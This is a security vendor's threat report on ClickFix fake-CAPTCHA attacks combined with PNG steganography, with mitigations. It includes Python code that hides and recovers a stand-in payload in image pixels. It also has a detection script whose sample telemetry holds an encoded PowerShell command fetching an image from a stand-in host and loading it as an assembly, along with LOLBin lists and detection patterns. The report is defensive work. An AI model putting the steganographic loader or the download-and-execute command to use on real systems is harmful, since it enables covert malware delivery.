
Beyond the click: Click Fix Meets Steganography

Published: December 4, 2025


Expert: Lorenzo Minga

Role: Security Analyst

Specialises in: Incident Response and Threat Hunting

What you will learn:
In this report, you will learn what Click Fix and Steganography are, how they work together to create a dangerous threat vector, and the mitigations available against them.
"In the age of visibility, invisibility is the ultimate vector. ClickFix is evolving, and with simple obfuscation techniques, it transforms into a silent yet potent attack vector. The greatest trick malware ever pulled was convincing you it wasn't there."

Click Fix is a social engineering technique that manipulates users into executing malicious commands on their own machines.

It begins when a user lands on a malicious or compromised website that displays a fake CAPTCHA or human-verification page. The page instructs the victim to complete three steps, exactly as shown in the screenshots from sandbox analysis:

  1. Press Windows + R
  2. Press CTRL + V
  3. Press Enter

The page's JavaScript has already written a command to the clipboard, so step 2 pastes it into the Windows Run dialog and step 3 executes it. The victim never types anything that looks like code, yet runs an attacker-chosen command that typically invokes a legitimate Windows utility (a LOLBin) such as mshta.exe to fetch and run the next stage. This lets attackers deliver and execute malware without dropping an obvious executable.

This technique has been rising rapidly and has now evolved through its combination with steganography.

Steganography is the practice of hiding malicious content within an ordinary, non-secret file to evade detection. Attackers commonly use Least Significant Bit (LSB) steganography to embed malicious scripts inside seemingly normal images, such as PNG files.

Opening such an image in a normal viewer shows only a picture; nothing runs by itself. The hidden bytes are recovered by a loader already executing on the victim's machine (here, the stage started by the Click Fix command), which downloads the image, reads the least significant bits back out and reassembles the payload, usually without the victim noticing anything.

Figure 2. Example of malware embedded inside a PNG using Least Significant Bit (LSB) steganography. The attacker hides code inside an innocent-looking image and sends it to the victim, who unknowingly triggers the malware when opening the file. From [blog.httpcs.com]

Recent threat activity shows Click Fix campaigns increasingly using fake Windows security update screens. These screens mimic legitimate update messages, such as:

โ€œWorking on updates. Please do not turn off your computer.
Part 3 of 3: Check security.โ€

Victims are then instructed to run a command that triggers mshta.exe (Figure 3, from BleepingComputer).

This initiates the first stage of malware delivery. 

The executed command fetches an image file from the attacker's server. The file is a valid PNG that renders normally, but its pixel data carries a malicious script embedded with steganography.

A loader on the victimโ€™s device decodes the hidden bytes from within the image and reconstructs a full malicious executable or payload – completing the entire infection chain. 
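The following is an added example, not code from the original post or from any of the cited reports, illustrating both the LSB steganography described above and the loader step just described. It writes a small RGB PNG, embeds a constructed stand-in payload one bit per colour sample behind a 4-byte length header, then does what a stego loader does: parses the PNG, inflates the pixel data and reads the bits back out. It also packs the LSB plane and measures its byte entropy per window, the simplest statistical hint a defender has that an image carries something other than picture noise. The PNG writer and reader (8-bit RGB, filter type 0 only), the header layout, the gradient cover and the payload string are all assumptions of this example; real loaders use their own layout and usually encrypt the hidden bytes.

```python
"""Added example, not code from the original post or the cited reports: hide
bytes in the least significant bits of a PNG's samples, recover them the way a
stego loader does, and score the LSB plane. Reader/writer handle 8-bit RGB with
filter type 0 only; cover, payload and the 4-byte length header are assumed here."""
import math
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
WIDTH, HEIGHT = 32, 8
# Constructed cover: a smooth gradient standing in for a real photo.
COVER = bytes(((x + y) & 0xFF) for y in range(HEIGHT) for x in range(WIDTH) for _ in range(3))
# Constructed stand-in for the hidden stage (real campaigns hide a script or an
# encrypted .NET assembly here); nothing in this example executes it.
PAYLOAD = b"Write-Host 'constructed stand-in payload, not a real loader'"


def _chunk(tag, body):  # length + type + data + CRC32(type + data)
    return struct.pack(">I", len(body)) + tag + body + struct.pack(">I", zlib.crc32(tag + body))


def write_png(width, height, rgb):
    """Encode raw 8-bit RGB samples; every row gets filter type 0 (None)."""
    stride = width * 3
    rows = b"".join(b"\x00" + bytes(rgb[y * stride:(y + 1) * stride]) for y in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # depth 8, colour type 2 = RGB
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(rows)) + _chunk(b"IEND", b"")


def read_png(data):
    """Walk the chunks, inflate IDAT, drop the per-row filter byte; return (w, h, rgb)."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos, idat, width, height = 8, b"", 0, 0
    while pos + 8 <= len(data):
        length, tag = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        if tag == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", body[:10])
            if (depth, ctype) != (8, 2):
                raise ValueError("example reader supports 8-bit RGB only")
        elif tag == b"IDAT":
            idat += body
        pos += 12 + length  # 4 length + 4 type + data + 4 CRC
    raw, stride, rgb = zlib.decompress(idat), width * 3, bytearray()
    for y in range(height):
        row = raw[y * (stride + 1):(y + 1) * (stride + 1)]
        if row[0] != 0:
            raise ValueError("example reader supports filter type 0 only")
        rgb += row[1:]
    return width, height, rgb


def lsb_embed(rgb, payload):
    """4-byte big-endian length, then payload; one bit per sample LSB, MSB first."""
    data = struct.pack(">I", len(payload)) + payload
    if len(data) * 8 > len(rgb):
        raise ValueError("cover too small: need %d samples" % (len(data) * 8))
    out = bytearray(rgb)
    for i, byte in enumerate(data):
        for b in range(8):
            out[i * 8 + b] = (out[i * 8 + b] & 0xFE) | ((byte >> (7 - b)) & 1)
    return out


def pack_lsb_plane(rgb):
    """Collect the LSB of every sample, eight to a byte: loader input, detector input."""
    out = bytearray()
    for i in range(0, len(rgb) - 7, 8):
        v = 0
        for b in range(8):
            v = (v << 1) | (rgb[i + b] & 1)
        out.append(v)
    return bytes(out)


def lsb_extract(rgb):
    """What the loader does: read the length header, then that many bytes."""
    plane = pack_lsb_plane(rgb)
    n = struct.unpack(">I", plane[:4])[0]
    if n > len(plane) - 4:
        raise ValueError("header claims more bytes than the image holds")
    return plane[4:4 + n]


def max_window_entropy(blob, window=64):
    """Bits per byte of the most random window of a packed LSB plane: a smooth
    cover packs to a few repeating values, embedded code or ciphertext does not."""
    best = 0.0
    for start in range(0, max(1, len(blob) - window + 1), max(1, window // 2)):
        chunk = blob[start:start + window]
        counts = {}
        for byte in chunk:
            counts[byte] = counts.get(byte, 0) + 1
        best = max(best, -sum(c / len(chunk) * math.log2(c / len(chunk)) for c in counts.values()))
    return best


def build_stego_png():  # attacker side: the "photo" hosted on the download server
    return write_png(WIDTH, HEIGHT, lsb_embed(COVER, PAYLOAD))


def recover_payload(png_bytes):  # loader side: parse the image, pull the bytes back out
    return lsb_extract(read_png(png_bytes)[2])
```

Calling `recover_payload(build_stego_png())` returns the original payload bytes, and the LSB plane of the stego image scores around 4 bits per byte against under 3 for the untouched gradient. Treat that entropy figure as a triage signal only: sensor noise gives real photographs a noisy LSB plane too, and an encrypted payload is indistinguishable from noise, so the stronger evidence is behavioural, namely the process that downloaded the image going on to decode it and load code.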

This method has been observed in multiple malware families, including LummaC2, and recent research shows new variants embedding encrypted .NET assemblies inside PNG files, as reported by Huntress. 

A successful Click Fix malware attack can lead to:

Credential harvesting
Data exfiltration
C2 beaconing
Backdoor installation
Ransomware deployment

Because execution is initiated by the user through a trusted, signed system utility rather than a dropped file, signature-based and file-centric defences are frequently bypassed.

Click Fix campaigns are expanding rapidly.

According to Infosecurity Magazine, Click Fix social engineering attacks have surged by 517% in the past six months, now becoming the second most common vector behind phishing.

The threat relies on:

Lack of user awareness
High trust in system prompts
Abuse of legitimate Windows utilities (LOLBins)
Payloads hidden inside images to bypass detection

Together, these elements create a scalable and highly effective attack vector.

Educate users to recognise fake verification pages and understand that system updates or CAPTCHA checks never require using the Run dialog or executing commands manually.

Advanced email filtering reduces the likelihood of phishing messages redirecting users to Click Fix-style malicious sites.

Actively monitor and block new IOC domains and prevent access to malicious URLs before users reach them.

Ensure EDR is enabled and fully monitoring. Behavioural detection can identify misuse of LOLBins such as mshta.exe and PowerShell.

Disable the Run dialog for standard users (the Group Policy setting "Remove Run menu from Start Menu", which sets NoRun under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer). This removes one launch path only: a pasted command still runs from the File Explorer address bar or a terminal, so treat it as a layer, not a fix.
Restrict PowerShell. Execution policy is not a security boundary: it governs script files only, commands passed on the command line or via -EncodedCommand are not subject to it, and -ExecutionPolicy Bypass overrides it. Constrained Language Mode, script block logging and application control give real control.
Limit access to LOLBins where operationally possible, for example by blocking mshta.exe for standard users with AppLocker or WDAC.

Continuously monitor legitimate OS processes for unusual behaviours such as:

mshta.exe initiating outbound connections
Unexpected image downloads
Decoding operations on image files
Suspicious PowerShell or .NET assembly loading

This level of telemetry is essential for detecting steganography-based loaders.
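As an added example (not the original post's code and not any vendor's detection content), the following Python turns the behaviours listed above into rules and runs them over a handful of constructed Sysmon-style events: a Run-dialog launch (parent explorer.exe) of a LOLBin with a URL on its command line, a LOLBin fetching an image URL, PowerShell loading a .NET assembly from memory (including when the keywords are hidden inside a base64 -EncodedCommand), and mshta.exe opening a network connection. The events, process IDs, rule names and the 203.0.113.7 address (TEST-NET-3) are constructed for the example.

```python
"""Added example, not the original post's or any vendor's detection content:
rules for the behaviours listed above, run over constructed Sysmon-style
events. Field names follow Sysmon Event ID 1 (process create) and 3 (network
connect); the events, PIDs, rule names and the 203.0.113.7 address (TEST-NET-3)
are constructed for this example."""
import base64
import re

LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
           "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
IMAGE_URL_RE = re.compile(r"https?://[^\s'\"]+\.(?:png|jpe?g|gif|bmp)\b", re.I)
# In-memory .NET loading, and the decode step that usually precedes it.
ASSEMBLY_LOAD_RE = re.compile(r"Assembly\]::Load|Add-Type|FromBase64String", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the usual ones.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """-EncodedCommand carries base64(UTF-16LE); return the plaintext, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(events):
    """Return (rule, ProcessId, detail) triples for events matching the listed behaviours."""
    findings = []
    for ev in events:
        image, parent = _basename(ev.get("Image", "")), _basename(ev.get("ParentImage", ""))
        cmd, pid = ev.get("CommandLine", ""), ev.get("ProcessId")
        # Inspect the decoded form too, or an encoded command hides every keyword below.
        effective = cmd + " " + (decode_encoded_command(cmd) or "")
        if ev.get("EventID") == 1:
            # Win+R, Ctrl+V, Enter: the Run dialog starts the command as a child of explorer.exe.
            if parent == "explorer.exe" and image in LOLBINS and URL_RE.search(effective):
                findings.append(("run_dialog_lolbin_with_url", pid, cmd))
            img = IMAGE_URL_RE.search(effective)
            if image in LOLBINS and img:
                findings.append(("lolbin_fetches_image_url", pid, img.group(0)))
            load = ASSEMBLY_LOAD_RE.search(effective)
            if image in {"powershell.exe", "pwsh.exe"} and load:
                findings.append(("powershell_inmemory_assembly_load", pid, load.group(0)))
        elif ev.get("EventID") == 3 and image == "mshta.exe":
            findings.append(("mshta_outbound_connection", pid, ev.get("DestinationIp")))
    return findings


# Constructed encoded command for the sample: fetch a PNG, load what is decoded from it.
_ENC = base64.b64encode(
    "$b=(New-Object Net.WebClient).DownloadData('http://203.0.113.7/photo.png');"
    "[Reflection.Assembly]::Load($b)".encode("utf-16le")).decode()

SAMPLE_EVENTS = [  # constructed telemetry: one Click Fix chain plus one benign admin action
    {"EventID": 1, "ProcessId": 4120, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://203.0.113.7/check.hta"},
    {"EventID": 1, "ProcessId": 4188,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell -w hidden -enc " + _ENC},
    {"EventID": 3, "ProcessId": 4120, "Image": r"C:\Windows\System32\mshta.exe",
     "DestinationIp": "203.0.113.7", "DestinationPort": 443},
    {"EventID": 1, "ProcessId": 5200,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(rule, pid, detail)
```

Running it flags the three attack events under four rules and leaves the benign console script alone. The same logic works on Windows Security event 4688 once command-line auditing is enabled, but without Sysmon Event ID 3 (or an equivalent from EDR) the mshta network rule has nothing to read, which is why the telemetry point above matters.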


Stay ahead of emerging threats like Click Fix and Steganography.
If youโ€™d like to understand your organisationโ€™s exposure or need support strengthening your defences, our CREST-accredited SOC team is here to help. Get in touch with our experts today.

Our Sources:

  1. https://www.proofpoint.com/uk/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
  2. https://www.bleepingcomputer.com/news/security/clickfix-attack-uses-fake-windows-update-screen-to-push-malware/amp/
  3. https://www.huntress.com/blog/clickfix-malware-buried-in-images
  4. ClickFix Attacks Surge 517% in 2025 – Infosecurity Magazine